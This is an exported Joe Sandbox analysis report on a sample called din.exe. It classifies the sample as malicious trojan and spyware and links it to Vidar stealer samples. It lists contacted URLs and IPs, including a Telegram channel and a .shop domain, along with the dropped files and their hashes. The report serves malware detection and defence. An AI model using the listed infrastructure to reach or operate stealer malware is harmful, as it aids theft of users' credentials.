                                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.28.dr, service_worker_bin_prod.js.28.drfalse
                                                                                                                                          high
                                                                                                                                          http://polymer.github.io/PATENTS.txtchrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/lichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Kichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://t.me/k04aelm0nk3Mozilla/5.0Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.autoitscript.com/autoit3/XCentered.com, 00000010.00000000.1274462155.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Dumb.0.dr, Centered.com.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://issuetracker.google.com/161903006msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.ecosia.org/newtab/chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, XTRIWB.16.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://chrome.google.com/webstore?hl=en6chrome.exe, 00000015.00000002.1893748702.000036EC01218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1856113571.000036EC0121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1835607263.000036EC01218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.google.com/Chartk3chrome.exe, 00000015.00000002.1888858362.000036EC0081C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://duckduckgo.com/favicon.icochrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891145184.000036EC00DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887531372.000036EC004B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/3078chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/7553chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/5375chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.29.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ogs.googchrome.exe, 00000015.00000002.1886075546.000036EC000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/4722chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
IP               Domain                                Country                     ASN      ASN Name                       Malicious
149.154.167.99   t.me                                  United Kingdom              62041    TELEGRAMRU                     false
18.238.49.74     unknown                               United States               16509    AMAZON-02US                    false
172.217.21.36    www.google.com                        United States               15169    GOOGLEUS                       false
20.110.205.119   unknown                               United States               8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
188.245.216.205  bijutr.shop                           Iran (ISLAMIC Republic Of)  16322    PARSONLINETehran-IRANIR        false
204.79.197.219   unknown                               United States               8068     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
142.250.181.65   googlehosted.l.googleusercontent.com  United States               15169    GOOGLEUS                       false
172.64.41.3      chrome.cloudflare-dns.com             United States               13335    CLOUDFLARENETUS                false
51.104.15.253    unknown                               United Kingdom              8075     MICROSOFT-CORP-MSN-AS-BLOCKUS  false
239.255.255.250  unknown                               Reserved                    unknown  unknown                        false
23.209.72.21     unknown                               United States               20940    AKAMAI-ASN1EU                  false
23.44.201.12     unknown                               United States               20940    AKAMAI-ASN1EU                  false
23.44.201.36     unknown                               United States               20940    AKAMAI-ASN1EU                  false
23.44.201.32     unknown                               United States               20940    AKAMAI-ASN1EU                  false
IP
192.168.2.7
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581179
Start date and time: 2024-12-27 07:08:15 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Sample name:din.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@82/297@21/16
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                • Number of executed functions: 79
                                                                                                                                                                                                                                                • Number of non-executed functions: 296
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:09:12 | API Interceptor | 1x Sleep call for process: din.exe modified
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.netlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\NGVAAIE3W4EU\5F3EKF | lem.exe | malicious | Vidar
 | script.ps1 | malicious | Vidar
 | Setup.msi | malicious | Vidar
 | nB52P46OJD.exe | malicious | Vidar
 | lem.exe | malicious | Vidar
 | Setup.exe | malicious | Vidar
 | xoJxSAotVM.exe | malicious | Vidar
 | fim3BhyKXP.gif | malicious | Unknown
 | TMX.exe | malicious | Unknown
 | file.exe | malicious | Amadey, Vidar
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):889
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.016955029110262
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                                                                                                                                                                                                                                      MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                                                                                                                                                                                                                                      SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                                                                                                                                                                                                                                      SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                                                                                                                                                                                                                                      SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.265142166671222
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMXSAELyKOMq+8HKkjucswRv8p3nVum1:K0q+n0JX9ELyKOMq+8HKkjuczRv895
                                                                                                                                                                                                                                                                                      MD5:7749D35D26380A5605EBD39948BD12CA
                                                                                                                                                                                                                                                                                      SHA1:A694839C1E844DE9DEA58022064A3DFA2FF6B8D5
                                                                                                                                                                                                                                                                                      SHA-256:EFF6E373B3FD123F4B0A64862FF00B0181C7220DD7EC7B635ABF15065902B075
                                                                                                                                                                                                                                                                                      SHA-512:557F7EAF39F3F75FDD2B513C32BEECCFF2856FB82830B8D7A73D40FD269041A7D545294D3762081B85FDFC4754187D3936679FC20DA68506FABF6E4DD49639D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24008
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                                      MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                                      SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                                      SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                                      SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
• Filename: lem.exe, Detection: malicious
• Filename: script.ps1, Detection: malicious
• Filename: Setup.msi, Detection: malicious
• Filename: nB52P46OJD.exe, Detection: malicious
• Filename: lem.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: xoJxSAotVM.exe, Detection: malicious
• Filename: fim3BhyKXP.gif, Detection: malicious
• Filename: TMX.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1095
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.976174799333973
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                                                                                                                                                                                                                                      MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                                                                                                                                                                                                                                      SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                                                                                                                                                                                                                                      SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                                                                                                                                                                                                                                      SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2947
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                                                      MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                                                      SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                                                      SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                                                      SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.861537145678193
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
                                                                                                                                                                                                                                                                                      MD5:6F0056EC818D4FC20158F3FF190D6D6A
                                                                                                                                                                                                                                                                                      SHA1:9E2108FE560CC2187395C5EED011559D201CE45D
                                                                                                                                                                                                                                                                                      SHA-256:2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
                                                                                                                                                                                                                                                                                      SHA-512:72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="*".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.*".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
